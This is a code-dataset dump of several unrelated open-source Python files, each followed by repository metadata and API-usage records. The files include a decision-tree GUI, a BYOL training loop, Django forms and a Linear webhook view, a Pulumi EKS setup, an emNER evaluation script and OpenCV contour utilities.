        # 1 Add a labeled combobox to top dock area
        self.add_datasets_combobox()
        # 2 Add a textedit to the left pane of the center area.
        self.text_editor = QTextEdit()
        self.text_editor.setLineWrapColumnOrWidth(600)
        self.text_editor.setLineWrapMode(QTextEdit.FixedPixelWidth)
        # 3 Add a tabbed_window to the right pane of the center area.
        self.tabbed_window = ZTabbedWindow(self, 0, 0, width/2, height)
        # 4 Add a description text edit.
        self.description = QTextEdit()
        self.description.setLineWrapColumnOrWidth(600)
        self.description.setLineWrapMode(QTextEdit.FixedPixelWidth)
        # 5 Add a figure_view to the right pane of the center area.
        self.figure_view = ZScalableScrolledFigureView(self, 0, 0, width/2, height)
        # 6 Add a figure_view to the right pane of the center area.
        self.tree_view = ZScalableScrolledDecisionTreeView(self, 0, 0, width/2, height)
        self.add(self.text_editor)
        self.add(self.tabbed_window)
        self.tabbed_window.add("Description", self.description)
        self.tabbed_window.add("ConfusionMatrix", self.figure_view)
        self.tabbed_window.add("DecisionTree", self.tree_view)
        # Result views stay hidden until visualize() is called after a run.
        self.figure_view.hide()
        self.tree_view.hide()
        self.show()

    def add_datasets_combobox(self):
        """Build the top dock: dataset combobox plus Start/Clear buttons."""
        self.dataset_id = Iris
        self.datasets_combobox = ZLabeledComboBox(self, "Datasets", Qt.Horizontal)
        # We use the following datasets of sklearn to test DecisionTreeClassifier.
        self.datasets = {"Iris": Iris, "Digits": Digits, "Wine": Wine, "BreastCancer": BreastCancer}
        title = self.get_title()
        self.setWindowTitle( "Iris" + " - " + title)
        self.datasets_combobox.add_items(self.datasets.keys())
        self.datasets_combobox.add_activated_callback(self.datasets_activated)
        # NOTE(review): set_current_text is given the integer dataset id,
        # not the display text -- confirm against the ZLabeledComboBox API.
        self.datasets_combobox.set_current_text(self.dataset_id)
        self.start_button = ZPushButton("Start", self)
        self.clear_button = ZPushButton("Clear", self)
        self.start_button.add_activated_callback(self.start_button_activated)
        self.clear_button.add_activated_callback(self.clear_button_activated)
        self.datasets_combobox.add(self.start_button)
        self.datasets_combobox.add(self.clear_button)
        self.set_top_dock(self.datasets_combobox)

    def write(self, text):
        """Append a line to the log editor and repaint immediately so
        progress is visible while a run blocks the event loop."""
        self.text_editor.append(text)
        self.text_editor.repaint()

    def datasets_activated(self, text):
        """Combobox callback: remember the chosen dataset id and retitle."""
        self.dataset_id = self.datasets[text]
        title = self.get_title()
        self.setWindowTitle(text + " - " + title)

    def start_button_activated(self, text):
        """Start callback: run the model pipeline synchronously, keeping
        the buttons disabled for the duration."""
        self.model = DecisionTreeClassifierModel(self.dataset_id, self)
        self.start_button.setEnabled(False)
        self.clear_button.setEnabled(False)
        try:
            self.model.run()
        except:
            # run() handles its own errors; this guard only ensures the
            # buttons below are always re-enabled.
            pass
        self.start_button.setEnabled(True)
        self.clear_button.setEnabled(True)

    def clear_button_activated(self, text):
        """Clear callback: reset texts, hide result views, close figures."""
        self.text_editor.setText("")
        self.description.setText("")
        self.figure_view.hide()
        self.tree_view.hide()
        if plt.gcf() != None:
            plt.close()

    def visualize(self, cmatrix, tree):
        """Show the confusion-matrix heatmap and the fitted decision tree.

        `tree` is the fitted model; feature/target names are read from a
        `dataset` attribute when present (failures are ignored)."""
        # 1 Show figure view
        self.figure_view.show()
        if plt.gcf() != None:
            plt.close()
        sns.set()
        df = pd.DataFrame(cmatrix)
        sns.heatmap(df, annot=True, fmt="d")
        self.figure_view.set_figure(plt)
        # 2 Show tree view
        self.tree_view.show()
        feature_names = None
        try:
            feature_names = tree.dataset.feature_names
        except:
            pass
        target_names = None
        try:
            target_names = tree.dataset.target_names
        except:
            pass
        self.tree_view.set_tree(tree, feature_names, target_names)
############################################################
#
# main(__name__) is presumably SOL4Py's run-as-script guard (true when this
# file is the entry point) -- confirm against the SOL4Py sources.
if main(__name__):
    try:
        app_name = os.path.basename(sys.argv[0])
        applet = QApplication(sys.argv)
        main_view = MainView(app_name, 40, 40, 1000, 500)
        main_view.show ()
        applet.exec_()
    except:
        traceback.print_exc()
| sarah-antillia/SOL4Py_V4 | ml/DecisionTreeClassifier.py | DecisionTreeClassifier.py | py | 8,676 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.path.append",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "traceback.print_exc",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "sklearn.datasets.lo... |
42262216968 | import os
import math
import multiprocessing
from tqdm import tqdm
from argparse import Namespace
from typing import Iterable, Optional
mp = multiprocessing.get_context("spawn")
from utils import _create_model_training_folder
import torch
import torch.nn.functional as F
import torchvision
from torch.nn.parameter import Parameter
from torch.utils.tensorboard import SummaryWriter
from tspipe import TSPipe
from tspipe.profiler import profile_semantic
from tspipe.dataloader import FastDataLoader, DummyInputGenerator
class BYOLTrainer:
    """Single-GPU BYOL trainer.

    Maintains an online network (trained by gradient descent) and a target
    network updated as an exponential moving average of the online weights
    (momentum ``m``). The loss is the symmetric normalized-MSE between
    online predictions and target projections of two augmented views.
    """

    def __init__(self, online_network, target_network, predictor, optimizer, device, scheduler, **params):
        self.online_network = online_network
        self.target_network = target_network
        self.optimizer = optimizer
        self.device = device
        self.predictor = predictor
        self.max_epochs = params['max_epochs']
        self.writer = SummaryWriter()
        self.m = params['m']  # EMA momentum for the target network
        self.batch_size = params['batch_size']
        self.num_workers = params['num_workers']
        self.checkpoint_interval = params['checkpoint_interval']
        # NOTE(review): eval() of a config string -- assumed trusted config.
        self.image_x = eval(params['input_shape'])[0]
        self.scheduler = scheduler
        # NOTE(review): the kwarg is spelled "files_to_same" in the utils API.
        _create_model_training_folder(self.writer, files_to_same=["./config/config.yaml", "main.py", 'trainer.py'])
        # `== True` is kept: only an explicit True (or 1) enables dummy input,
        # matching the original `True if ... == True else False` behavior.
        self.dummy_input = params['dummy_input'] == True
        if self.dummy_input:
            print("Warning: Dummy Input Enabled.")

    @torch.no_grad()
    def _update_target_network_parameters(self):
        """
        Momentum update of the key encoder
        """
        for param_q, param_k in zip(self.online_network.parameters(), self.target_network.parameters()):
            param_k.data = param_k.data * self.m + param_q.data * (1. - self.m)

    @staticmethod
    def regression_loss(x, y):
        """Per-sample BYOL loss: 2 - 2 * cosine_similarity(x, y)."""
        x = F.normalize(x, dim=1)
        y = F.normalize(y, dim=1)
        return 2 - 2 * (x * y).sum(dim=-1)

    def initializes_target_network(self):
        # init momentum network as encoder net
        for param_q, param_k in zip(self.online_network.parameters(), self.target_network.parameters()):
            param_k.data.copy_(param_q.data)  # initialize
            param_k.requires_grad = False  # not updated by gradient

    def train(self, train_dataset):
        """Run the full training loop over ``train_dataset``."""
        train_loader = FastDataLoader(train_dataset, batch_size=self.batch_size,
                                      num_workers=self.num_workers, drop_last=False,
                                      shuffle=True, pin_memory=True)
        niter = 0
        model_checkpoints_folder = os.path.join(self.writer.log_dir, 'checkpoints')
        self.initializes_target_network()
        batch_id = 0
        for epoch_counter in range(self.max_epochs):
            if self.dummy_input:
                # Synthetic batches: benchmark training without data loading.
                dummy_input_gen = DummyInputGenerator(self.batch_size, input_shape=self.image_x)
                pbar = tqdm(dummy_input_gen)
            else:
                pbar = tqdm(train_loader)
            for (batch_view_1, batch_view_2), _ in pbar:
                batch_id += 1
                profile_semantic(niter, 0, 0, False, None, 0, 'copy')
                batch_view_1 = batch_view_1.to(self.device)
                profile_semantic(niter, 0, 0, False, None, 0, 'copy_finish')
                profile_semantic(niter, 1, 0, False, None, 0, 'copy')
                batch_view_2 = batch_view_2.to(self.device)
                profile_semantic(niter, 1, 0, False, None, 0, 'copy_finish')
                if niter == 0:
                    # Log a sample of both augmented views once per run.
                    grid = torchvision.utils.make_grid(batch_view_1[:32])
                    self.writer.add_image('views_1', grid, global_step=niter)
                    grid = torchvision.utils.make_grid(batch_view_2[:32])
                    self.writer.add_image('views_2', grid, global_step=niter)
                loss = self.update(batch_view_1, batch_view_2, niter)
                self.writer.add_scalar('loss', loss, global_step=niter)
                profile_semantic(niter, 0, 0, False, None, 0, 'backward')
                self.optimizer.zero_grad()
                loss.backward()
                profile_semantic(niter, 0, 0, False, None, 0, 'backward_finish')
                profile_semantic(niter, 0, 0, False, None, 0, 'optimize')
                self.optimizer.step()
                self._update_target_network_parameters()  # update the key encoder
                profile_semantic(niter, 0, 0, False, None, 0, 'optimize_finish')
                pbar.set_postfix({'loss': loss, 'batch_id': batch_id})
                niter += 1
                if batch_id % 100 == 0:
                    self.save_model(os.path.join(model_checkpoints_folder, f'model_batch{batch_id}_part0.pt'))
                # (removed) dead code: an unused torch.nn.MSELoss was
                # constructed here on every iteration after the first batch.
            print("End of epoch {}".format(epoch_counter))
            if self.scheduler is not None:
                self.scheduler.step()
        # save checkpoints
        self.save_model(os.path.join(model_checkpoints_folder, 'model.pth'))

    def update(self, batch_view_1, batch_view_2, niter=0):
        """Compute the symmetric BYOL loss for one batch; returns a scalar."""
        # compute query features (gradients flow through online + predictor)
        profile_semantic(niter, 0, 0, False, None, 0, 'compute')
        predictions_from_view_1 = self.predictor(self.online_network(batch_view_1))
        profile_semantic(niter, 0, 0, False, None, 0, 'compute_finish')
        profile_semantic(niter, 1, 0, False, None, 0, 'compute')
        predictions_from_view_2 = self.predictor(self.online_network(batch_view_2))
        profile_semantic(niter, 1, 0, False, None, 0, 'compute_finish')
        # compute key features (stop-gradient target network)
        with torch.no_grad():
            profile_semantic(niter, 0, 0, True, None, 0, 'compute')
            targets_to_view_2 = self.target_network(batch_view_1)
            profile_semantic(niter, 0, 0, True, None, 0, 'compute_finish')
            profile_semantic(niter, 1, 0, True, None, 0, 'compute')
            targets_to_view_1 = self.target_network(batch_view_2)
            profile_semantic(niter, 1, 0, True, None, 0, 'compute_finish')
        profile_semantic(niter, 0, 0, False, None, 0, 'loss')
        loss = self.regression_loss(predictions_from_view_1, targets_to_view_1)
        loss += self.regression_loss(predictions_from_view_2, targets_to_view_2)
        profile_semantic(niter, 0, 0, False, None, 0, 'loss')
        return loss.mean()

    def save_model(self, PATH):
        """Checkpoint both networks and the optimizer state to PATH."""
        torch.save({
            'online_network_state_dict': self.online_network.state_dict(),
            'target_network_state_dict': self.target_network.state_dict(),
            'optimizer_state_dict': self.optimizer.state_dict(),
        }, PATH)
class DummyBYOLTrainer(BYOLTrainer):
    """Trainer variant that only iterates the data loader.

    No forward/backward pass is performed; useful for benchmarking the
    input pipeline in isolation.
    """

    def train(self, train_dataset):
        loader = FastDataLoader(train_dataset, batch_size=self.batch_size,
                                num_workers=self.num_workers, drop_last=False,
                                shuffle=True)
        self.initializes_target_network()
        for epoch in range(self.max_epochs):
            for (view_a, view_b), _ in tqdm(loader):
                pass  # consume the batch; do nothing with it
            print("End of epoch {}".format(epoch))
class TSPipeBYOLTrainer(BYOLTrainer):
    """BYOL trainer driven by TSPipe.

    Forward/backward execution and target-network EMA updates happen inside
    a TSPipe instance; this class feeds batches and drives the cosine
    learning-rate / momentum schedules.
    """

    def __init__(self, online_network, target_network, predictor, optimizer: torch.optim.Optimizer, device, scheduler, **params):
        super().__init__(online_network, target_network, predictor, optimizer, device, scheduler, **params)
        # The base constructor already stores the networks, optimizer,
        # scheduler, dummy-input flag and image size. The duplicated
        # re-assignments (and the second "Dummy Input Enabled" warning they
        # caused) were removed; only TSPipe-specific state is added here.
        self.predictor_network = predictor
        self.params = params

    @staticmethod
    def contrastive_loss(online_view_1, online_view_2, target_view_1, target_view_2, args: Namespace, extra_args: Namespace):
        """Symmetric BYOL regression loss; used as TSPipe's loss callback."""
        loss = TSPipeBYOLTrainer.regression_loss(online_view_1, target_view_2)
        loss += TSPipeBYOLTrainer.regression_loss(online_view_2, target_view_1)
        return loss.mean()

    @staticmethod
    def calculate_target_network_parameters(m, online_new_param, target_param: Optional[Iterable[Parameter]] = None):
        """
        Momentum update of the key encoder: returns detached tensors
        ``target * m + online * (1 - m)`` for each parameter pair.
        """
        @torch.no_grad()
        def calc():
            result = []
            for param_q, param_k in zip(online_new_param, target_param):
                detached = param_k.clone().detach()
                detached = detached * m + param_q.data * (1. - m)
                result.append(detached)
            return result
        return calc()

    def train(self, train_dataset):
        """Feed batches into TSPipe; only the primary process loads data."""
        model_checkpoints_folder = os.path.join(self.writer.log_dir, 'checkpoints')
        self.initializes_target_network()
        initial_lr = self.optimizer.param_groups[0]['lr']
        print(f"initial_lr : {initial_lr}")
        initial_momentum = self.params['m']
        print(f"initial_momentum : {initial_momentum}")
        warmup_epochs = 10
        lr = self.adjust_learning_rate(1, warmup_epochs=warmup_epochs, initial_lr=initial_lr)
        m = self.adjust_moco_momentum(0, initial_momentum)
        self.tspipe = TSPipe(self.online_network,
                             self.target_network,
                             self.predictor_network,
                             self.optimizer,
                             TSPipeBYOLTrainer.contrastive_loss,
                             TSPipeBYOLTrainer.calculate_target_network_parameters,
                             self.m,
                             model_checkpoints_folder
                             )
        if self.tspipe.is_primary:
            # prepare dataloader
            if self.dummy_input:
                train_loader = DummyInputGenerator(self.batch_size, input_shape=self.image_x)
            else:
                train_loader = FastDataLoader(train_dataset, batch_size=self.batch_size,
                                              num_workers=self.num_workers, drop_last=False,
                                              shuffle=True, pin_memory=False)
            iters_per_epoch = len(train_loader)
            print(f"iters_per_epoch : {iters_per_epoch}")
            niter = 0
            for epoch_counter in range(self.max_epochs):
                pbar = tqdm(train_loader)
                for (batch_view_1, batch_view_2), _ in pbar:
                    if niter == 0:
                        grid = torchvision.utils.make_grid(batch_view_1[:32])
                        self.writer.add_image('views_1', grid, global_step=niter)
                        grid = torchvision.utils.make_grid(batch_view_2[:32])
                        self.writer.add_image('views_2', grid, global_step=niter)
                    # Shared memory lets TSPipe worker processes read the
                    # tensors without an extra copy.
                    loss = self.tspipe.feed(batch_view_1.share_memory_(), batch_view_2.share_memory_())
                    if loss is not None:
                        self.writer.add_scalar('loss', loss, global_step=niter)
                        # NOTE(review): grouped under the None-check (the
                        # source indentation was ambiguous) -- confirm
                        # against upstream.
                        pbar.set_postfix({'loss': loss, 'batch_id': niter})
                    niter += 1
                print("End of epoch {}".format(epoch_counter))
                self.tspipe.feed_epoch()
                # Advance the cosine schedules once per epoch.
                lr = self.adjust_learning_rate(epoch_counter + 1, warmup_epochs=warmup_epochs, initial_lr=initial_lr)
                m = self.adjust_moco_momentum(epoch_counter, initial_momentum)
                self.tspipe.update_lr(lr)
                self.tspipe.update_momentum(m)
                self.writer.add_scalar('learning_rate', lr, global_step=niter)
                self.writer.add_scalar('momentum', m, global_step=niter)
            self.tspipe.stop()
            # save checkpoints
            print("Saving checkpoints...")
            self.save_model(os.path.join(model_checkpoints_folder, 'model.pth'))
            print("Saving checkpoints OK")

    def adjust_learning_rate(self, epoch, warmup_epochs, initial_lr):
        """Decays the learning rate with half-cycle cosine after warmup"""
        if epoch < warmup_epochs:
            lr = initial_lr * epoch / warmup_epochs
        else:
            lr = initial_lr * 0.5 * (1. + math.cos(math.pi * (epoch - warmup_epochs) / (self.params['max_epochs'] - warmup_epochs)))
        for param_group in self.optimizer.param_groups:
            param_group['lr'] = lr
        return lr

    def adjust_moco_momentum(self, epoch, initial_momentum):
        """Adjust moco momentum based on current epoch (cosine ramp to 1)."""
        m = 1. - 0.5 * (1. + math.cos(math.pi * epoch / self.params['max_epochs'])) * (1. - initial_momentum)
        return m

    def update(self, batch_view_1, batch_view_2):
        """Plain (non-pipelined) BYOL loss; kept for parity/debugging."""
        # compute query feature
        predictions_from_view_1 = self.predictor(self.online_network(batch_view_1))
        predictions_from_view_2 = self.predictor(self.online_network(batch_view_2))
        # compute key features
        with torch.no_grad():
            targets_to_view_2 = self.target_network(batch_view_1)
            targets_to_view_1 = self.target_network(batch_view_2)
        loss = self.regression_loss(predictions_from_view_1, targets_to_view_1)
        loss += self.regression_loss(predictions_from_view_2, targets_to_view_2)
        return loss.mean()
{
"api_name": "multiprocessing.get_context",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "torch.utils.tensorboard.SummaryWriter",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "utils._create_model_training_folder",
"line_number": 36,
"usage_type": "... |
20353033243 | from __future__ import absolute_import
import itertools
from django import forms
from .models import Episode
class ScoreboardForm(forms.Form):
    """Form selecting the classes and episodes shown on the scoreboard."""

    def __init__(self, *args, **kwargs):
        classes = kwargs.pop("classes")
        super(ScoreboardForm, self).__init__(*args, **kwargs)
        classes_choices = [(c.id, c.name) for c in classes]
        self.fields["classes"] = forms.MultipleChoiceField(
            choices=classes_choices, widget=forms.CheckboxSelectMultiple()
        )
        # Each tuple in choices has two elements, id and name of each level.
        # First element is the actual value set on the model; second element
        # is the string displayed in the widget.
        # Materialised as a list: the original wrapped a generator in
        # itertools.chain(), a no-op single-iterable wrapper.
        episodes_choices = [(episode.id, episode.name) for episode in Episode.objects.all()]
        self.fields["episodes"] = forms.MultipleChoiceField(
            choices=episodes_choices,
            widget=forms.CheckboxSelectMultiple(),
        )
class LevelModerationForm(forms.Form):
    """Form for picking which classes a teacher moderates levels for."""

    def __init__(self, *args, **kwargs):
        classes = kwargs.pop("classes")
        teacher = kwargs.pop("teacher")
        super(LevelModerationForm, self).__init__(*args, **kwargs)

        def class_label(klass):
            # Admins see who owns each class; "(you)" marks their own.
            if not teacher.is_admin:
                return klass.name
            if klass.teacher == teacher:
                owner = "(you)"
            else:
                owner = f"({klass.teacher.new_user.first_name} {klass.teacher.new_user.last_name})"
            return f"{klass.name} " + owner

        classes_choices = [(klass.id, class_label(klass)) for klass in classes]
        self.fields["classes"] = forms.MultipleChoiceField(
            choices=classes_choices, widget=forms.CheckboxSelectMultiple()
        )
| ocadotechnology/rapid-router | game/forms.py | forms.py | py | 1,935 | python | en | code | 53 | github-code | 36 | [
{
"api_name": "django.forms.Form",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "django.forms",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "django.forms.MultipleChoiceField",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "dj... |
10623176651 | """An AWS Python Pulumi program"""
import pulumi
from pulumi_aws import eks
import networking
config = pulumi.Config();
environment = config.require('environment');
instance_size = config.require('instance-size');
eks_service_role = config.require('eks-service-role');
node_instance_role = config.require('node-instance-role');
node_pool_desired_size = config.require('pool-desired-size');
node_pool_min_size = config.require('pool-min-size');
node_pool_max_size = config.require('pool-max-size');
node_ssh_key = config.require('node-ssh-key')
eks_node_disk_size = config.require('eks-node-disk-size')
eks_version = config.require('eks-version')
#Create EKS required Roles
eks_cluster = eks.Cluster(
f'{environment}',
role_arn=eks_service_role,
version=eks_version,
tags={
'Name': f'{environment}',
},
vpc_config=eks.ClusterVpcConfigArgs(
public_access_cidrs=['0.0.0.0/0'],
security_group_ids=[networking.eks_security_group.id],
subnet_ids=networking.subnet_ids,
),
)
eks_node_group = eks.NodeGroup(
f'{environment}-wng1',
cluster_name=eks_cluster.name,
node_group_name=f'{environment}-wng1',
node_role_arn=node_instance_role,
subnet_ids=networking.subnet_ids,
disk_size=int(eks_node_disk_size),
instance_types=[instance_size],
remote_access=eks.NodeGroupRemoteAccessArgs(
ec2_ssh_key=node_ssh_key,
),
tags={
'Name': f'{environment}-wng1',
},
scaling_config=eks.NodeGroupScalingConfigArgs(
desired_size=int(node_pool_desired_size),
max_size=int(node_pool_max_size),
min_size=int(node_pool_min_size),
),
) | dtorresf/iac | pulumi/eks/__main__.py | __main__.py | py | 1,663 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pulumi.Config",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "pulumi_aws.eks.Cluster",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "pulumi_aws.eks",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "pulumi_aws.eks.Clu... |
14159899947 | from seqeval.metrics import classification_report
from seqeval.metrics import f1_score
from typing import List
import os
# the order for evaluating the script is in the main function
def create_fake_conll_form_without_iob_to_emNER_input():
    """Strip the IOB labels from the NerKor test set and write a
    one-column CoNLL-U-plus file ("form" header) that emNER accepts."""
    with open("/NerKor/test.iob", "r", encoding="utf-8") as f:
        lines = f.readlines()
    parts = ["form\n"]  # emNER expects a "form" header row
    for line in lines:
        if line != "\n":
            parts.append(line.split("\t")[0] + "\n")
        else:
            parts.append("\n")
    with open("input_for_emNER_nerkor_test.conllup", "w", encoding="utf-8") as f:
        f.write("".join(parts))
def conll_conv2_iobes():
    """Convert emNER's CoNLL output ("nerkor_test.out") into a two-column
    token/label file ("emNER_nerkor_test.iobes").

    The first input line (the header) is skipped. Returns silently when
    the input file does not exist.
    """
    # Bug fix: the guard used to test "nekor_test.out" (missing 'r'), so it
    # never matched the file opened below and the early-return never fired.
    if not os.path.exists("nerkor_test.out"):
        return
    with open("nerkor_test.out", "r", encoding="utf-8") as f:
        corpus = f.readlines()
    current = ""
    for i in range(1, len(corpus)):  # start at 1: skip the header line
        if corpus[i] != "\n":
            current += corpus[i].split("\t")[0] + "\t" + corpus[i].split("\t")[-1]
        else:
            current += "\n"
    with open("emNER_nerkor_test.iobes", "w", encoding="utf-8") as f:
        f.write(current)
def iobes_convert2_iob():
    """Rewrite emNER's IOBES labels as plain IOB: a "1" prefix
    (single-token entity) becomes "B" and an "E" prefix (entity end)
    becomes "I". Other labels pass through unchanged."""
    if not os.path.exists("emNER_nerkor_test.iobes"):
        return
    with open("emNER_nerkor_test.iobes", "r", encoding="utf-8") as src:
        rows = src.readlines()
    with open("emNER_nerkor_test.iob", "w", encoding="utf-8") as dst:
        for row in rows:
            if row == "\n":
                dst.write("\n")
                continue
            token, tag = row.split("\t")[0], row.split("\t")[1]
            if tag.startswith("1"):
                tag = "B" + tag[1:]
            elif tag.startswith("E"):
                tag = "I" + tag[1:]
            dst.write(token + "\t" + tag)
def pred():
    """Read the predicted IOB file and return one label list per sentence.

    Sentences are delimited by blank lines; a trailing sentence without a
    closing blank line is not included. Prints the sentence count.
    """
    if not os.path.exists("emNER_nerkor_test.iob"):
        return
    with open("emNER_nerkor_test.iob", "r", encoding="utf-8") as f:
        lines = f.readlines()
    sentences = []
    current = []
    for line in lines:
        if line.strip():
            current.append(line.split("\t")[1][:-1])  # drop trailing newline
        else:
            sentences.append(current)
            current = []
    print(len(sentences))
    return sentences
def gold():
    """Read the gold NerKor IOB file and return one label list per
    sentence (blank-line delimited). Prints the sentence count."""
    with open("/NerKor/test.iob", "r", encoding="utf-8") as f:
        lines = f.readlines()
    sentences = []
    current = []
    for line in lines:
        if line.strip():
            current.append(line.split("\t")[1][:-1])  # drop trailing newline
        else:
            sentences.append(current)
            current = []
    print(len(sentences))
    return sentences
def fscore(gold_iob: List[List[str]], pred_iob: List[List[str]]):
    """Print the entity-level F1 score and the per-label classification
    report (seqeval) for gold vs. predicted IOB label sequences."""
    print(f1_score(gold_iob, pred_iob))
    print(classification_report(gold_iob, pred_iob))
if __name__ == "__main__":
# create_fake_conll_form_without_iob_to_emNER_input()
# bash: cat input_for_emNER_nerkor_test.conllup | docker run -i mtaril/emtsv:latest emMorph,emTag,emNER > nerkor_test.out
# conll_conv2_iob()
# iobes_convert2_iob()
fscore(gold(), pred())
| huspacy/huspacy-resources | scripts/benchmark/emNER_eval.py | emNER_eval.py | py | 3,617 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.exists",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "os.path.exists",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number... |
26419246863 | import cv2
import numpy as np
from functions import top_offset
class SceneMoments():
    """Contour and convexity-defect statistics for one colour class of a
    segmented scene image, with optional stats on the colour's complement.
    """

    def __init__(self, sections_img, color, min_contour_size=1000, type_object="", offset=True, compl=False):
        self.min_contour_size = min_contour_size
        self.type_object = type_object
        # Binary mask of pixels exactly matching `color`.
        self.bw = np.all(sections_img == color, axis=-1).astype(np.uint8)
        if offset:
            self.bw = self.bw[top_offset:, :]
        # Bug fix: a stray debug cv2.waitKey(0) was removed here; it blocked
        # construction whenever a HighGUI window was open.
        sections_bw = self.bw * 255
        self.contours = self.get_contours(sections_bw)
        self.contour, self.contour_index = self.get_contour()
        self.defects = self.get_defects()
        self.compl = compl
        if compl:
            sections_bw_compl = 255 - sections_bw
            self.contours_compl = self.get_contours(sections_bw_compl)
            # Bug fix: the complement defects used to be recomputed from
            # self.contours (the normal mask); use the complement contours.
            self.defects_compl = self.get_defects(self.contours_compl)

    def get_contours(self, img_bw):
        """Return all contours of a binary image (flat list, full points)."""
        contours, _ = cv2.findContours(img_bw, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)
        return contours

    def get_defects(self, contours=None):
        """Convexity defects [start, end, mid, depth] of the largest
        contour in `contours` (default: self.contours), keeping only
        defects deeper than min_contour_size."""
        if contours is None:
            contours = self.contours
            index = self.contour_index
        else:
            index = self._largest_contour_index(contours)
        if index < 0:
            return []
        chull_list = [cv2.convexHull(contour, returnPoints=False) for contour in contours]
        defects = [cv2.convexityDefects(contour, chull) for (contour, chull) in zip(contours, chull_list)]
        if len(defects) == 0 or np.all(np.equal(defects[0], None)):
            return []
        defect = defects[index]
        if not isinstance(defect, np.ndarray):
            return []
        defect = defect[:, 0, :].tolist()
        return [[start, end, mid, length] for start, end, mid, length in defect
                if length > self.min_contour_size]

    def _largest_contour_index(self, contours):
        """Index of the largest-area contour, or -1 for an empty list.
        Ties keep the earliest contour (strict > comparison)."""
        best_i, best_area = -1, -1.0
        for i, contour in enumerate(contours):
            area = cv2.contourArea(contour)
            if area > best_area:
                best_i, best_area = i, area
        return best_i

    '''
    Return the largest contour
    '''
    def get_contour(self):
        if len(self.contours) == 0:
            return [], -1
        index = self._largest_contour_index(self.contours)
        return self.contours[index], index

    '''
    Return a list of string containing useful data about the object: length of the contours and length of the defects for both, complement and normal
    '''
    def sstr(self):
        lengths = "{} contours: {} defects: {}".format(self.type_object, len(self.contours), len(self.defects))
        if not self.compl:
            return [lengths, ""]
        lengths_compl = "Compl contours: {} defects: {}".format(len(self.contours_compl), len(self.defects_compl))
        return [lengths, lengths_compl, ""]

    def paint_defects(self, img, color):
        """Draw a dot at each defect's deepest point (offset-corrected)."""
        if len(self.contours) == 0:
            return img
        contour = self.contour
        for s, e, m, l in self.defects:
            cv2.circle(img, (contour[m][0][0], contour[m][0][1] + top_offset), 5, color, -1)
        return img

    def paint_lines(self, img, color):
        """Draw the hull segment spanning each defect (offset-corrected)."""
        if len(self.contours) == 0:
            return img
        contour = self.contour
        for s, e, m, l in self.defects:
            cv2.line(img, (contour[s][0][0], contour[s][0][1] + top_offset),
                     (contour[e][0][0], contour[e][0][1] + top_offset), color, 2)
        return img

    def paint_contours(self, img, color):
        """Draw the largest contour shifted back by top_offset."""
        if len(self.contours) == 0:
            return img
        contour = self.contour
        contour = np.array([[[c[0][0], c[0][1] + top_offset]] for c in contour])
        cv2.drawContours(img, contour, -1, color, 2)
        return img
{
"api_name": "numpy.all",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "functions.top_offset",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "cv2.waitKey",
"li... |
12083042499 | import json
import logging
from django.contrib import messages
from django.contrib.auth.decorators import login_required, user_passes_test
from django.core.management import call_command
from django.http import HttpRequest, HttpResponse
from django.http.response import HttpResponseRedirect
from django.urls import reverse
from django.utils.timezone import now as tz_now
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_http_methods
from .models import LinearIssue
logger = logging.getLogger(__name__)
@login_required
@user_passes_test(lambda u: u.is_staff)
def import_issues(request: HttpRequest) -> HttpResponseRedirect:
    """Admin action: pull all issues from the Linear API via the
    ``import_issues`` management command, then redirect back to the
    LinearIssue changelist. Requires the ``linear.use_api`` permission.
    """
    # Bug fix: has_perms() expects an iterable of permission names; passing
    # a bare string made it iterate the string's characters and always
    # fail. has_perm() is the single-permission API.
    if not request.user.has_perm("linear.use_api"):
        # (message grammar also fixed: "do not permission" -> "do not have")
        messages.add_message(
            request, messages.ERROR, "You do not have permission to use the Linear API"
        )
    else:
        call_command("import_issues")
        messages.add_message(
            request,
            messages.SUCCESS,
            "All Linear issues have been imported successfully",
        )
    return HttpResponseRedirect(reverse("admin:linear_linearissue_changelist"))
@csrf_exempt
@require_http_methods(["POST"])
def webhook(request: HttpRequest) -> HttpResponse:
    """
    Process a Linear webhook event.

    Only Issue events are handled; "Create" and "Update" are treated the
    same way. Sets the identifier, team_name, title, state and estimate
    fields. The project_name and milestone_name fields are not included
    in the webhook payload.
    """
    try:
        payload = json.loads(request.body.decode("utf-8"))
        data = payload["data"]
        if payload["type"] != "Issue":
            return HttpResponse("We are not interested in non-Issue updates")
    except (json.JSONDecodeError, KeyError):
        logger.exception("Unable to process Linear webhook event")
        return HttpResponse(
            "We couldn't process the request, but we're sending back a 200 anyway."
        )
    # id, team and state are always present; project/milestone are not.
    # (local renamed from `id`, which shadowed the builtin)
    issue_id = data["id"]
    title = data["title"]
    team_name = data["team"]["name"]
    state = data["state"]["name"]
    estimate = data.get("estimate")
    identifier = f'{data["team"]["key"]}-{data["number"]}'
    try:
        issue = LinearIssue.objects.get(id=issue_id)
    except LinearIssue.DoesNotExist:
        issue = LinearIssue.objects.create(id=issue_id)
    issue.title = title
    issue.state = state
    issue.estimate = estimate
    issue.team_name = team_name
    issue.identifier = identifier
    issue.last_refreshed_at = tz_now()
    issue.save()
    return HttpResponse("Task updated")
| yunojuno/django-linear | linear/views.py | views.py | py | 2,704 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "django.http.HttpRequest",
